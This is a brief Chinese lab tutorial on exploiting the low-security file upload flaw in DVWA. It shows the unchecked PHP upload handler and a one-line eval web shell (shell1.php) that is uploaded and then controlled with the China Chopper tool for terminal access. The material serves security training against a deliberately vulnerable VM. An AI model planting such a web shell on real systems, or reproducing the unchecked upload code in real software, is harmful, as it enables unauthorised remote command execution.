一. 预备知识
二 准备工作:
中国菜刀
攻击机kali linux
靶机OWASP_Broken_Web_Apps_VM_1.2 (1)
下载地址:https://wiki.owasp.org/index.php/Category:OWASP_Download
打开靶机,在火狐上打开DVWA
第一节 文件上传基础漏洞(低安全版)
上传时没有对文件信息进行过滤和检测而导致文件上传漏洞。
php代码如下:
if(isset($_POST["Upload"])) {
$target_path =DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path =$target_path.basename($_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'],$target_path)) {
echo "<pre>";
echo "Your image was not uploaded.";
echo "<pre>";
}else {
echo "<pre>";
echo $target_path."succesfully uploaded!";
echo "<pre>";
}
}
在这里插入代码片
1) 上传文件(shell1.php)
这里可以自己创建shell1.php,内容如下
<?php @eval($_POST['chopper']);?>
2)上传成功
3) 使用中国菜刀
获取虚拟终端权限制